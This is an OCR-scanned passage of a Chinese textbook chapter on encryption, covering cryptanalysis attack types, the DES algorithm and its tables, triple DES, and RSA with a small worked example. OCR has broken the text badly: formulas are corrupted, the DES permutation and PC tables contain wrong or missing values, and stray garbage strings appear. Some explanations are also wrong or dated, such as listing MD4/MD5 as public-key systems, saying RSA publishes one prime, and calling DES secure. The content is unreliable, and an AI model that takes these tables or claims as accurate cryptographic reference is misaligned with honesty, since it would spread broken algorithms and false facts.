立 。 在 大 多 数 对 称 算法 中 ,加 解密 的 密 钥 是 相同 的 。 这 些 算 法 也 叫 秘 密 密 钥 算法 或 单 密 钥 
算法 , 它 要 求 发 送 者 和 接收 者 在 安全 通信 之 前 ,协商 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 
钥 ,泄漏 密 钥 就 意味 着 任何 人 都 能 对 消息 进行 加 解密 。 只 要 通信 需要 保密 , 密 钥 就 必须 保 
密 。 对 称 算法 的 加 密 和 解密 表示 为 : 
Er(M)=C 
Drk(C) = M 
对 称 算 法 可 分 为 两 类 。 一 次 只 对 明文 中 的 单个 位 (有 时 对 字 节 ) 运 算 的 算法 称 为 序列 算 
法 或 序列 密码 。 另 一 类 算法 是 对 明文 的 一 组 位 进行 运算 ,这些 位 组 称 为 分 组 ,相应 的 算法 称 
为 分 组 算法 或 分 组 密码 。 现 代 计 算 机 密码 算法 的 典型 分 组 长 度 为 64 位 一 一 这 个 长 度 既 考 
虑 到 分 析 破 译 密码 的 难度 ,又 考虑 到 使 用 的 方便 性 。 后 来 , 随 着 破译 能 力 的 发 展 , 分 组 长 度 
又 提高 到 128 位 或 更 长 。 
5. 公开 密 钥 算法 
公开 密 钥 算法 (Public-Key Algorithm) 也 叫 非 对 称 算法 , 它 的 工作 原理 是 : 用 做 加 密 的 
密 钥 不 同 于 用 做 解密 的 密 钥 ,而 且 解密 密 钥 不 能 根据 加 密 密 钥 计算 出 来 (至 少 在 合理 假定 的 
时 间 内 )。 之 所 以 叫做 公开 密 钥 算法 ,是 因为 加 密 密 钥 能 够 公开 , 即 陌生 者 能 用 加 密 密 钥 加 
密 信 息 , 但 只 有 用 相应 的 解密 密 钥 才能 解密 信息 。 在 这 些 系统 中 ,加 密 密 钥 叫 做 公开 密 钥 
(Public Key) ,解密 密 钥 叫做 私人 密 钥 (Private Key) 。 
用 公开 密 钥 K! 加 密 表示 为 : Er (CM) 一 C。 
用 相应 的 私人 密 钥 K, 解密 可 表示 为 : Drz(C) 一 M。 
有 时 信息 用 私人 密 钥 加 密 而 用 公开 密 钥 解密 ,这 种 方法 主要 用 于 数字 签名 。 
6. 密码 分 析 
密码 编码 学 的 主要 目的 是 保持 明文 (或 密 钥 , 或 明文 和 密 钥 ) 的 秘密 以 防止 偷 听 者 (对 
手 、 攻 击 者 、 敌 人 ) 知 晓 。 这 里 假设 偷 听 者 完全 能 够 截获 收发 者 之 间 的 通信 。 
密码 分 析 学 是 在 不 知道 密 钥 的 情况 下 ,恢复 出 明文 的 科学 。 成 功 的 密码 分 析 能 恢复 出 
消息 的 明文 或 密 钥 。 密 码 分 析 也 可 以 发 现 密码 体制 的 弱点 ,最 终 得 到 上 述 结果 ( 密 钥 通过 非 
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密码 分 析 方式 的 丢失 叫做 泄漏 ) 。 

常用 的 密码 分 析 攻 击 有 以 下 几 种 ,当然 ,每 一 类 都 假设 密码 分 析 者 知道 所 用 的 加 密 算法 
的 全 部 知识 。 

(1) 唯 密 文 攻击 (Cipher Text-Only Attack)。 密 码 分 析 者 有 一 些 消 息 的 密 文 ,这 些 消 
息 都 用 同一 加 密 算法 加 密 。 密 码 分 析 者 的 任务 是 恢复 尽 可 能 多 的 明文 ,或 者 最 好 是 能 推算 
出 加 密 消息 的 密 钥 来 ,以 便 采用 相同 的 密 钥 解密 出 其 他 被 加 密 的 消息 。 

已 知 : C1=Exr(Pi),C;=Er(P:),*…,C;= Ex(P;) 

推导 出 : PiusPsssP;s K 或 者 找 出 一 个 算法 从 Ci+i 二 Ex (Pi+i) 推 出 Pepis 

(2) 已 知 明文 攻击 (Known-Plaintext Attack)。 密 码 分 析 者 不 仅 可 得 到 一 些 消息 的 密 
文 , 而 且 也 知道 这 些 消息 的 明文 。 分 析 者 的 任务 就 是 用 加 密 信息 推出 用 来 加 密 的 密 钥 或 导 
出 一 个 算法 ,此 算法 可 以 对 用 同一 密 钥 加 密 的 任何 新 的 消息 进行 解密 。 

已 知 : P,,C: 王 Br(CP,),P:,Cz 一 Erk(CP:) Pi,Ci 一 Er(Pi) 

推导 出 : 密 钥 ,或 从 Ci 一 ErkCPi+) 推 出 Pi+ 的 算法 。 

(3) 选择 明文 攻击 (Chosen-Plaintext Attack) 。 分 析 者 不 仅 可 得 到 一 些 消息 的 密 文 和 
相应 的 明文 ,而 且 他 们 也 可 选择 被 加 密 的 明文 。 这 比 已 知 明 文 攻击 更 有 效 。 因 为 密码 分 析 
者 能 选择 特定 的 明文 块 去 加 密 ,那些 块 可 能 产生 更 多 关于 密 钥 的 信息 ,分 析 者 的 任务 是 推出 
用 来 加 密 消 息 的 密 钥 或 导出 一 个 算法 ,此 算法 可 以 对 用 同一 密 钥 加 密 的 任何 新 的 消息 进行 

已 知 : Pi ,Ci 一 Er(CPi),P:,C: 一 Er(CP:) ,PC 一 Ek(CP) 

其 中 Pi ,P: ,…',P; 只 可 由 密码 分 析 者 选择 。 

推导 出 : 密 钥 ,或 从 Ci+1 二 Exr(Pi+1) 推 出 Pi+1 的 算法 。 

(4) 自 适 应 选择 明文 攻击 (Adaptive-Chosen-Plaintext Attack)。 这 是 选择 明文 攻击 的 
特殊 情况 。 密 码 分 析 者 不 仅 能 选择 被 加 密 的 明文 ,而 且 也 能 基于 以 前 加 密 的 结果 修正 这 个 
选择 。 在 选择 明文 攻击 中 ,密码 分 析 者 还 可 以 选择 一 大 块 被 加 了 密 的 明文 。 而 在 自 适应 选 
择 密 文 攻击 中 ,攻击 者 可 选取 较 小 的 明文 块 ,然后 再 基于 第 一 块 的 结果 选择 另 一 明文 块 ,以 
此 类 推 。 

另外 还 有 至 少 三 类 其 他 的 密码 分 析 攻 击 。 

(5) 选择 密 文 攻击 (Chosen-Cipher Text Attack)。 密 码 分 析 者 能 选择 不 同 的 被 加 密 的 
密 文 ,并 可 得 到 对 应 的 解密 的 明文 ,例如 密码 分 析 者 存 取 一 个 防 算 改 的 自动 解密 盒 ,密码 分 
析 者 的 任务 是 推算 出 密 钥 。 

已 知 : Cl,P: 王 Drk(Ci) ,Cs ,P: 一 Dr(CCs) CiP; 一 Dr(CCi) 

推导 出 : 密 钥 天。 

这 种 攻击 主要 用 于 公开 密 钥 体制 ,选择 密 文 攻击 有 时 也 可 有 效 地 用 于 对 称 算法 (有 时 选 
择 明文 攻击 和 选择 密 文 攻击 一 起 称 做 选择 文本 攻击 ) 。 

(6) 选择 密 钥 攻击 (Chosen-Key Attack)。 这 种 攻击 并 不 表示 密码 分 析 者 能 够 选择 密 
钥 , 它 只 表示 密码 分 析 者 具有 不 同 密 钥 之 间 的 关系 的 有 关 知 识 。 

(7) 软 磨 硬 泡 攻击 (Rubber-Hose Cryptanalysis) 。 对 密码 分 析 者 进行 威胁 .勒索 ,或 者 
折磨 ,直到 他 给 出 密 钥 为 止 。 行 贿 有 时 称 为 购买 密 角 攻击。 这些 是 非常 有 效 的 攻击 ,并 且 经 
常 是 破译 算法 的 最 好 途径 。 
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7.2 DES 对 称 加 密 技术 


DES 是 Data Encryption Standard( 数 据 加 密 标 准 ) 的 缩写 。 它 是 由 IBM 公司 研制 的 一 
种 对 称 密码 算法 ,美国 国家 标准 局 于 1977 年 公布 把 它 作 为 非 机 要 部 门 使 用 的 数据 加 密 标 
准 , 三 十 多 年 来 , 它 一 直 活 跃 在 国际 保密 通信 的 舞台 上 ,扮演 了 十 分 重要 的 角色 。 

在 1972 年 和 1974 年 美国 国家 标准 局 两 次 向 公众 发 出 了 征求 加 密 算法 的 公告 。 对 加 密 
算法 提出 了 以 下 几 点 要 求 。 

(1) 提供 高 质量 的 数据 保护 ,防止 数据 未 经 授权 的 泄漏 和 未 被 察觉 的 修改 。 

(2) 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 可 能 获得 的 利益 ,同时 又 要 便于 理解 和 
掌握 。 

(3) DES 密码 体制 的 安全 性 应 该 不 依赖 于 算法 的 保密 ,其 安全 性 仅 以 加 密 密 钥 的 保密 
为 基础 。 

(4) 实现 经 济 ,运行 有 效 , 并 且 适 用 于 多 种 完全 不 同 的 应 用 。 

(5) 实现 算法 的 电子 器 件 必须 经 济 .运行 有 效 。 

(6) 必须 能 够 验证 ,允许 出 口 。 

DES 是 一 个 分 组 加 密 算法 ,典型 的 DES 以 64 位 为 分 组 对 数据 加 密 , 加 密 和 解密 用 的 是 
同一 个 算法 。 它 的 密 钥 长 度 是 56 位 (因为 每 个 第 8 位 都 用 做 奇偶 校 验 ) , 密 钥 可 以 是 任意 的 
56 位 的 数 ,而 且 可 以 在 任意 时 候 改变 。 其 中 有 极 少 数 被 认为 是 易 破解 的 弱 密 钥 , 但 是 很 容 
易 避 开 它们 不 用 。 所 以 保密 性 依赖 于 密 钥 。 

简单 地 说 ,算法 只 不 过 是 加 密 的 两 个 基本 技术 一 一 混乱 和 扩散 的 组 合 。DES 组 建 分 组 
是 这 些 技术 的 一 个 组 合 ( 先 代替 后 置换 ), 它 基于 密 钥 作 用 于 明文 ,这 就 是 众所周知 的 轮 
(round)。DES 有 16 轮 , 这 意味 着 要 在 明文 分 组 上 实施 16 次 相同 的 组 合 技术 。 此 算法 只 
使 用 了 标准 的 算术 和 逻辑 运算 ,而 其 作用 的 数 也 最 多 只 有 64 位 。 


7.2.1 DES 算法 的 原理 


DES 算法 的 入 口 参数 有 三 个 : Key、Data、Mode。 其 中 Key 为 8 个 字 节 共 64 位 ,是 
DES 算法 的 工作 密 钥 ; Data 也 为 8 个 字 节 64 位 ,是 要 被 加 密 或 被 解密 的 数据 ; Mode 为 
DES 的 工作 方式 ,有 两 种 : 加 密 或 解密 。 

DES 算法 是 这 样 工作 的 : 如 Mode 为 加 密 , 则 用 Key 把 数据 Data 进行 加 密 , 生 成 Data 
的 密码 形式 (64 位 ) 作 为 DES 的 输出 结果 ; 如 Mode 为 解密 , 则 用 Key 把 密码 形式 的 数据 
Data 解密 ,还 原 为 Data 的 明码 形式 (64 位 ) 作 为 DES 的 输出 结果 。 在 通信 网 络 的 两 端 , 双 
方 约定 一 致 的 Key, 在 通信 的 源 点 用 Key 对 核心 数据 进行 DES 加 密 , 然 后 以 密码 形式 在 公 
共通 信 网 (如 电话 网 ) 中 传输 到 通信 网 络 的 终点 ,数据 到 达 目 的 地 后 .用 同样 的 Key 对 密码 
数据 进行 解密 , 便 再 现 了 明码 形式 的 核心 数据 。 这 样 , 便 保证 了 核心 数据 在 公共 通信 网 中 传 
输 的 安全 性 和 可 靠 性 。 通 过 定期 在 通信 网络 的 源 端 和 目的 端 同时 更 换 用 新 的 Key, 便 能 进 
一 步 提高 数据 的 保密 性 ,这 是 现在 金融 交易 网 络 的 流行 做 法 。 
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7.2.2 ”加 密 过 程 


DES 算法 实现 加 密 需 要 以 下 三 个 步骤 。 
第 一 步 : 变换 明文 。 对 给 定 的 64 位 的 明文 x, 首 先 通过 一 个 置换 表 IP 表 来 重新 排列 
工 , 从 而 构造 出 64 位 的 zo ,zo 二 IP(z) 二 LoRo ,其 中 Lo 表示 zo 的 前 32 位 ,R。 表示 zo 的 后 
38 位 。 
第 二 步 : 按照 规则 迭代。 规则 为 L; 二 Ri_， 
R; = L;@ f(Rii, Ki)(i = 1,2,3,.…,16) 
经 过 第 一 步 变换 已 经 得 到 L。 和 R。 的 值 ,其 中 符号 外 


表示 的 数学 运算 是 异 或 ,f 表示 一 种 置换 ,由 S 盒 略 换 构 Ce 

成 ,Ki 是 一 些 由 密 铀 编排 函数 产生 的 比特 块 。 三 和 天, 将 

在 后 面 介绍 。 一 
第 三 步 : 对 LisRie 利 用 IP 做 逆 置 换 , 就 得 到 了 密 文 Lo Ro 


y。 加 密 过 程 如 图 7 所 示 。 轩 有 Pp 
0 R=LOfR KJE12.16 
转换 表 和 IP-: 逆 转换 表 ,函数 太子 密 钥 K, 和 S 使 的 工作 


原理 。 TP 逆 置换 表 
1. IP 置换 表 和 IP-! 疗 置换 表 
输出 64 位 密 文 


输入 的 64 位 数据 按 IP 置换 表 进 行 重新 组 合 ,并 把 输 
出 分 为 Lo、R。 两 部 分 ,每 部 分 各 长 32 位 ,其 IP 置换 表 如 图 7-2 DES 加 密 系统 
表 7-1 所 示 。 

表 7-1 IP 置换 表 

58 50 12 34 26 18 10 2 60 52 44 36 28 20 12 

62 54 46 38 30 22 14 64 56 48 40 32 24 16 


6 
57 49 41 33 25 17 9 Ll 59 51 43 35 27 19 11 
61 53 45 37 29 21 13 5 63 55 47 39 31 23 35 


Nw 


将 输入 64 位 的 第 58 位 换 到 第 一 位 ,第 50 位 换 到 第 二 位 ,以 此 类 推 ,最 后 一 位 是 原来 的 
第 7 位。L。、R。 则 是 换 位 输出 后 的 两 部 分 ,Lo 是 输出 的 左 32 位 ,Ro 是 右 32 位 。 比 如 : 置换 
前 的 输入 值 为 D, Ds D;…Ds , 则 经 过 初始 置换 后 的 结果 为 L, 二 Dss Dso…Ds ,Ro 二 Ds; Dis…D;。 

经 过 16 次 迭代 运算 后 ,得 到 Lis 、Ris .将 此 作为 输入 ,进行 逆 置 换 , 即 得 到 密 文 输出 。 首 
置换 正好 是 初始 置换 的 逆 运 算 ,例如 ,第 一 位 经 过 初始 置换 后 ,处 于 第 40 位 ,而 通过 逆 置 换 
IP-: ,又 将 第 40 位 换 回 到 第 一 位 ,其 逆 置 换 IP :规则 如 表 7-2 所 示 。 


表 7-2 逆 置 换 表 JP 


40 8 48 16 56 24 64 32 39 7 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 33 1 41 9 49 17 57 25 
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2. 函数 了 
函数 f 有 两 个 输入 : 32 位 的 R;_1 和 48 位 的 K;,f 函数 的 处 理 流程 如 图 7-3 所 示 。 


32 位 Ri | 
1 
EE 变换 | 
48 位 


48 位 K; 
48 位 
EEEE EE El 
132 位 
P 变 换 | 
1 


32 位 输出 | 


图 7-3 函数 了 的 处 理 流程 


E 变换 的 算法 是 从 R;-1 的 32 位 中 选取 某 些 位 ,构成 48 位 。 即 巨 将 32 位 扩展 变换 为 
48 位 ,变换 规则 根据 巨 位 选择 表 , 如 表 7-3 所 示 。 
表 7-3 巨 位 选择 表 
32 1 2 3 4 5 4 5 6 7 8 9 8 9 10 11 
12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 
22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 | 


K; 是 由 密 钥 产生 的 48 位 比特 串 , 具 体 的 算法 下 面 介绍 。 将 的 选 位 结果 与 ;做 异 或 
操作 ,得 到 一 个 48 位 输出 。 分 成 8 组 ,每 组 6 位 ,作为 8 个 S 盒 的 输入 。 
每 个 S 盒 输出 4 位 , 共 32 位 ,S 盒 的 工作 原理 将 在 第 4 步 介 绍 。S 盒 的 输出 作为 P 变 
换 的 输入 ,P 的 功能 是 对 输入 进行 置换 ,P 换 位 表 如 表 7-4 所 示 。 
表 7-4 P 换 位 表 
“16 7 20 21 2 12 28 17 1 1 23 26 5 18 3 10 


3. 子 密 钥 K; 


假设 密 钥 为 KK, 长度 为 64 位 ,但 是 其 中 第 8、16、24、32、40、48、64 用 做 奇偶 校 验 位 ,实际 
上 密 钥 长 度 为 56 位 。K 的 下 标 i 的 取 值 范围 是 1~16, 用 16 轮 来 构造 。 构 造 过 程 如 图 7-4 
所 示 。 

首先 ,对 于 给 定 的 密 钥 ,应 用 PC1 变换 进行 选 位 , 选 定 后 的 结果 是 56 位 , 设 其 前 28 
位 为 Cu ,后 28 位 为 Du。PC1 选 位 如 表 7-5 所 示 。 

第 一 轮 : 对 Co 做 左 移 LS 得 到 Ci ,对 Du 做 左 移 LS 得 到 Di ,对 C1、D, 应 用 PC, 进行 
选 位 ,得 到 K; 。 其 中 LS, 是 左 移 的 位 数 ,如 表 7-6 所 示 。 
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64 位 密 钥 字符 串 玉 
PC1 变 化 
56 位 
8 位 站 28 位 
Co Do 
1 1 
LS LS 
i i 
CI DI 
; E PC2 变 化 上 48 位 KI 
LS; LS; 
1 1 
全 D, 
fy PC2 变 化 六 一 48 位 K> 
LSi6 LSi6 
1 i 
Cie Di6 
一 | PC2 变 化 上 一 48 位 Ki6 
图 7-4 子 密 钥 生成 
表 7-5 PC1 选 位 表 
57 49 41 33 25 到 9 1 58 50 42 34 26 18 
10 2 59 51 43 35 27 19 11 3 60 52 44 36 
63 55 47 39 31 23 15 7 62 54 46 38 30 22 
14 6 61 53 45 37 29 21 13 5 28 20 镑 4 
表 7-6 LS 移 位 表 
2 2 2 2 1 2 2 2 2 1 


表 7-6 中 的 第 一 列 是 LS ,第 二 列 是 LS; ,以 此 类 推 。 左 移 的 原理 是 所 有 二 进位 向 左 移 
动 ,原来 最 右边 的 比特 位 移动 到 最 左边 。 其 中 PC2 如 表 7-7 所 示 。 


表 7-7 PC2 选 位 表 


14 17 
23 19 
41 52 
44 49 


28 15 

7 27 
40 51 
42 50 


21 
13 
33 
29 


第 二 轮 : 对 Ci ,Di 做 左 移 LS; 得 到 C; 和 D; ,进一步 对 C;、D; 应 用 PC2 进行 选 位 ,得 
到 KK,。 如 此 继续 ,分 别 得 到 K; ,K ，…, Kis。 
4. S 盒 的 工作 原理 
S 盒 以 6 位 作为 输入 ,而 以 4 位 作为 输出 ,现在 以 Sl 为 例 说 明 其 过 程 。 假 设 输入 为 A= 
aiazasaiasai, 则 azasasas 所 代表 的 数 是 0 一 15 之 间 的 一 个 数 , 记 为 : & 一 azasasas; 由 alias 
所 代表 的 数 是 0 一 3 间 的 一 个 数 , 记 为 h 二 aias。 在 Sl 的 姑 行 列 找到 一 个 数 已 ,B 在 0 一 


第 7 章 信息 加 密 技术 95 


15 之 间 , 它 可 以 用 4 位 二 进 制 表 示 ,为 B 二 61626sb4 ,这 就 是 Sl 的 输出 。S 盒 是 由 8 张 数据 
表 组 成 (这 里 就 不 详细 给 出 ) 。 

DES 算法 的 解密 过 程 是 一 样 的 ,区 别 仅 在 于 第 一 次 迭代 时 用 子 密 钥 Kie ,第 二 次 用 
Kis ,最 后 一 次 用 Ki ,算法 本 身 并 没有 任何 变化 。DES 的 算法 是 对 称 的 , 既 可 用 于 加 密 又 可 
用 于 解密 。 


7.2.3 DES 解密 


在 经 过 所 有 的 代替 ,转换 、 异 或 和 循环 移动 之 后 ,读者 或 许 认为 解密 算法 与 加 密 算法 完 
全 不 同 , 且 也 如 加 密 算法 一 样 有 很 强 的 混乱 效果 。 恰 恰 相 反 , 经 过 精心 选择 各 种 操作 ,会 获 
得 这 样 一 个 非常 有 用 的 性 质 : 加 密 和 解密 可 使 用 相同 的 算法 。 

DES 使 得 用 相同 的 函数 来 加 密 或 解密 每 个 分 组 成 为 可 能 ,二 者 唯一 不 同 之 处 是 密 钥 的 
次 序 相 反 。 这 就 是 说 ,如 果 各 轮 的 加 密 密 钥 分 别 是 KiKzK:,…','Kis' 那 么 解密 密 钥 就 是 
Kis ,Kis ,Ku，… ,Ki。 为 各 轮 产生 密 钥 的 算法 也 是 循环 的 。 密 钥 向 右 移 动 ,每 次 移动 的 个 
22 1227272727251e 


7.2.4 DES 算法 的 应 用 误区 


DES 算法 具有 比较 高 的 安全 性 ,到 目前 为 止 ,除了 用 穷 举 搜 索 法 对 DES 算法 进行 攻击 
外 ,还 没有 发 现 更 有 效 的 办 法 。 而 56 位 长 的 密 钥 的 穷 举 空间 为 2”, 这 意味 着 如 果 一 台 计 算 
机 的 速度 是 每 一 秒 钟 检测 一 百 万 个 密 钥 , 则 它 搜索 完全 部 密 钥 就 需要 将 近 2285 年 的 时 间 ， 
可 见 , 这 是 难以 实现 的 。 当 然 , 随 着 科学 技术 的 发 展 , 当 出 现 超 高 速 计算 机 后 ,可 以 考虑 把 
DES 密 钥 的 长 度 再 增长 一 些 , 以 此 来 达到 更 高 的 保密 程度 。 

由 上 述 DES 算法 介绍 可 以 看 到 : DES 算法 中 只 用 到 64 位 密 钥 中 的 56 位 ,而 第 8,16， 
24,…,64 位 8 个 位 并 未 参与 DES 算法 ,这 一 点 提出 了 一 个 应 用 上 的 要 求 , 即 DES 的 安全 性 是 
基于 除了 第 8,16,24,…,64 位 外 的 其 余 56 位 的 组 合 变化 才 得 以 保证 的 。 因 此 ,在 实际 应 用 
中 ,应 避 开 使 用 第 8,16,24,…:,64 位 作为 有 效 数据 位 ,而 使 用 其 他 的 56 位 作为 有 效 数据 位 ， 
才能 保证 DES 算法 安全 可 靠 地 发 挥 作用 。 如 果 不 了 解 这 一 点 ,把 密 钥 Key 的 8,16,24,…， 
64 位 作为 有 效 数据 使 用 ,将 不 能 保证 DES 加 密 数据 的 安全 性 ,对 应 用 DES 来 达到 保密 作用 
的 系统 产生 数据 破译 的 危险 ,这 正 是 DES 算法 在 应 用 上 的 误区 , 留 下 了 被 人 攻击 破译 的 极 
大 隐患 。 


7.2.5 三 重 DES 


DES 的 唯一 密码 学 缺点 就 是 密 钥 长 度 较 短 。 解 决 密 钥 长 度 问题 的 办 法 之 一 是 采用 三 
重 DES。 三重 DES 方法 需要 执行 三 次 常规 的 DES 加 密 步 又 ,但 最 常用 的 三 重 DES 算法 中 
仅 用 两 个 56 位 DES 密 钥 。 设 这 两 个 密 钥 为 K! 和 K; ,其 算法 的 步骤 如 下 。 

(1) 用 密 钥 K, 进行 DES 加 密 。 

(2) 对 上 面 的 结果 使 用 密 钥 K; 进行 DES 解密 。 

(3) 对 上 一 步 的 结果 使 用 天, 进行 DES 加 密 。 

这 个 过 程 称 为 EDE, 因 为 它 是 由 加 密 - 解 密 -加 密 步骤 组 成 的 。 在 EDE 中 ,中 间 步 又 是 
解密 ,所 以 ,可 以 使 K! 和 KK; 用 三 重 DES 方法 执行 常规 的 DES 加 密 。 
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三 重 DES 的 缺点 是 时 间 开销 较 大 ,三 重 DES 的 时 间 是 DES 算法 的 三 倍 。 但 从 另 一 方 
面 看 ,三 重 DES 的 112 位 密 钥 长 度 在 可 以 预见 的 将 来 可 认为 是 合适 的 。 

DES 被 认为 是 安全 的 ,这 是 因为 要 破译 它 可 能 要 尝试 2 个 不 同 的 56 位 密 钥 直到 找到 
正确 的 密 钥 。 


7.3 RSA 公 钥 加 密 技 术 


7.3.1 RSA 算法 的 原理 


1976 年 ,Diffie 和 Hellman 在 文章 “密码 学 新 方向 (New Direction in Cryptography) ”中 
首次 提出 了 公开 密 钥 密码 体制 的 思想 。1977 年 ,Rivest、Shamir 和 Adleman 三 个 人 实现 了 
公开 密 钥 密 码 体 制 ,现在 称 为 RSA 公开 密 钥 体 制 , 它 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 
数字 签名 的 算法 。 这 种 算法 易于 理解 和 操作 ,算法 的 名 字 以 发 明 者 的 名 字 命 名 。 但 RSA 的 
安全 性 一 直 未 能 得 到 理论 上 的 证 明 。 它 经 历 了 各 种 攻击 ,至 今 未 被 完全 攻破 。 

RSA 算法 是 一 种 基于 大 数 不 可 能 质 因 数 分 解 假设 的 公 钥 体系 。 简 单 地 说 ,就 是 找 两 个 
很 大 的 质数 ,一 个 公开 给 世界 , 称 之 为 “ 公 钥 ”, 另 一 个 不 告诉 任何 人 , 称 之 为 “ 私 钥 ”。 两 把 密 
钥 互 补 一 一 用 公 钥 加 密 的 密 文 可 以 用 私 钥 解密 , 反 过 来 也 一 样 。 假 设 A 寄 信 给 B, 他 们 知 
道 对 方 的 公 钥 。A 可 用 B 的 公 钥 加 密 邮件 寄 出 ,B 收 到 后 用 自己 的 私 钥 解 出 A 的 原文 ,这 
样 就 保证 了 邮件 的 安全 性 。 

RSA 体制 可 以 简单 描述 如 下 。 

(1) 生成 两 个 大 素数 p 和 9g。 

(2) 计算 这 两 个 素数 的 乘积 n 二 pq。 

(3) 计算 小 于 nn 并 且 与 互 质 的 整数 的 个 数 , 即 欧 拉 函数 %(Cz) 一 (bp 一 1)(q 一 1) 。 

(4) 选择 一 个 随机 数 满足 1 二 5 二 $m) ,并 且 5 和 $8(mw) 互 质 , 即 gcd(b, $8(n)) 二 1。 

(5) 计算 ab==1 mod $(n)。 

(6) 保密 a,p 和 g ,公开 n 和 6。 

利用 RSA 加 密 时 ,明文 以 分 组 的 方式 加 密 : 每 一 个 分 组 的 比特 数 应 该 小 于 logzn 比特 。 
加 密 明 文 zx 时 ,利用 公 钥 (0, n) 来 计算 c= 二 x* mod n 就 可 以 得 到 相应 的 密 文 c<。 解 密 的 时 候 ， 
通过 计算 mod n 就 可 以 恢复 出 明文 x 。 

选取 的 素数 p 和 g 要 足够 大 ,从 而 乘积 足够 大 ,在 事先 不 知道 p 和 g 的 情况 下 分 解 n 
在 计算 上 是 不 可 行 的 。 

为 了 展示 RSA 生成 密 钥 的 过 程 ,下 面 给 出 一 个 例子 。 此 例子 选择 了 一 个 相对 比较 容易 
验证 的 数字 ,而 实际 应 用 中 RSA 算法 的 难度 更 大 一 些 。 

(1) 首先 选择 两 个 素数 ,例如 选择 p= 二 11 和 一 13。 

(2) 计算 n=pXg=143。 

(3) 计算 HW)=(11 一 1) X(13 一 1)=120。 

(4) 对 于 互 (0) 一 120 的 一 个 互 质 的 数 为 e, 这 里 选择 e 一 7。 

(5) 选择 d, 条 件 de 二 1 mod 昌 (n) ,因此 dX7==1 mod 120, 且 4d 小 于 120。 则 d==103。 
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(6) 私 钥 是 {103,143)。 

(7) 公 钥 是 {7,143})。 

为 了 进行 真正 的 加 密 和 解密 ,可 以 使 用 原来 的 公式 : 密 文 =( 明 文 )* mod n, 明 文 =( 密 
文 )* mod n。 如 果 明 文 是 9, 则 应 用 公式 后 ,可 得 密 文王 97 mod 143 一 48。 收 到 信息 后 解密 
可 得 明文 =48'” mod 143 二 9。 

常用 的 公 钥 加 密 算法 包括 : RSA 密码 体制 .ElGamal 密码 体制 和 散 列 函数 密码 体制 
(MD4、MD5 等 ) ,椭圆 曲线 密 文 系统 。 


7.3.2 RSA 公开 密 钥 密码 系统 


RSA 要 求 每 一 个 用 户 拥有 自己 的 一 对 密 钥 : 

(1) 公开 的 加 密 密 钥 , 用 以 加 密 明 文 。 

(2) 保密 的 解密 密 钥 , 用 于 解密 密 文 。 

在 RSA 密 钥 体制 中 , 当 A 用 户 发 文件 给 B 用 户 时 ,A 用 户 用 B 用 户 公开 的 密 钥 加 密 明 
文 ,B 用 户 则 用 解密 密 钥 解读 密 文 , 其 特点 如 下 。 

(1) 密 钥 配 发 十 分 方便 ,用 户 的 公用 密 钥 可 以 像 电 话 号 码 簿 那样 公开 ,使 用 方便 ,这 对 
网 络 环境 下 众多 用 户 的 系统 , 密 钥 管理 更 加 简便 ,每 个 用 户 只 需 持 有 一 对 密 钥 就 可 实现 与 网 
络 中 任何 一 个 用 户 的 保密 通信 。 

(2) RSA 加 密 原理 基于 单 向 函数 ,非法 接收 者 利用 公用 密 钥 不 可 能 在 有 限时 间 内 推算 
出 秘密 密 钥 ,这 种 算法 的 保密 性 能 较 好 。 

(3) RSA 在 用 户 确 认 和 实现 数字 签名 方面 优 于 现 有 的 其 他 加 密 机 制 。RSA 数字 签名 
是 一 种 强 有 力 的 认证 鉴别 方式 ,可 保证 接收 方 能 够 判定 发 送 方 的 真实 身份 。 另 外 ,如 果 信 息 
离开 发 送 方 后 发 生变 更 , 它 可 以 确保 这 种 变更 能 被 发 现 。 更 为 重要 的 是 , 当 收发 方 发 生 争执 
时 ,数字 签名 提供 了 不 可 抵赖 的 事实 。 

下 面 通过 图 7-5 了 解 一 下 RSA 的 加 密 工 作 过 程 。 


Il \ 
A 的 公 钥 ， 私 钥 


发 送 史 接收 中 
用 记 B 用 户 A 

[1 -0 传送 的 密 文 0 a 

明文 输入 几 和 


图 7-5 RSA 加 密 过 程 示 意图 


使 用 RSA 来 对 通信 的 双方 进行 信息 加 密 保护 时 ,其 实际 步骤 如 下 。 

。 每 个 用 户 产生 一 对 密 钥 用 于 加 密 和 解密 消息 。 

”每 个 用 户 将 其 中 的 一 个 密 钥 放 入 公共 寄存 器 或 者 其 他 可 访问 的 文件 中 。 这 个 密 钥 
就 是 公 钥 。 该 用 户 把 另 一 个 密 钥 自 己 保存 。 如 图 7-5 所 示 ,每 个 用 户 都 拥有 从 其 他 
人 那里 获得 的 公 钥 的 集合 。 
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”如 果 也 希望 向 A 发 送 一 条 私人 信息 ,那么 B 使 用 A 的 公 钥 加 密 消息 。 
。 当 A 收 到 该 信息 的 时 候 ,A 使 用 A 的 私 钥 解密 信息 。 没 有 其 他 的 接收 者 能 够 解密 
消息 ,因为 只 有 A 知道 私 钥 。 

在 这 种 方法 中 ,所 有 的 参与 者 都 能 够 访问 公 钥 ,而 私 钥 是 由 每 个 参与 者 在 本 地 产生 , 因 
此 不 需要 分 配 。 只 要 用 户 保护 好 他 的 私 钥 ,接收 的 通信 就 是 安全 的 。 在 任何 时 候 , 用 户 都 能 
够 改变 私 钥 ,并 公布 相应 的 公 钥 值 以 替换 旧 的 公 钥 值 。 

通常 称 在 常规 加 密 中 使 用 的 密 钥 为 密 钥 ,而 称 在 公 钥 加 密 中 使 用 的 两 个 密 钥 分 别 为 公 
钥 和 私 钥 。 所 以 ,如 果 需 要 对 私 钥 进行 保密 ,这 时 称 之 为 私 钥 而 不 是 密 钥 ,以免 与 常规 加 密 
混 消 。 


7.3.3 RSA 算法 的 安全 


RSA 的 安全 性 依赖 于 大 数 分 解 ,但 是 否 等 同 于 大 数 分 解 一 直 未 能 得 到 理论 上 的 证 明 ， 
因为 没有 证 明 破 解 RSA 就 一 定 需 要 进行 大 数 分 解 。 假 设 存 在 一 种 无 须 分 解 大 数 的 算法 ， 
那 它 肯定 可 以 修改 成 为 大 数 分 解 算法 。 目 前 ,RSA 的 一 些 变种 算法 已 被 证 明 等 价 于 大 数 分 
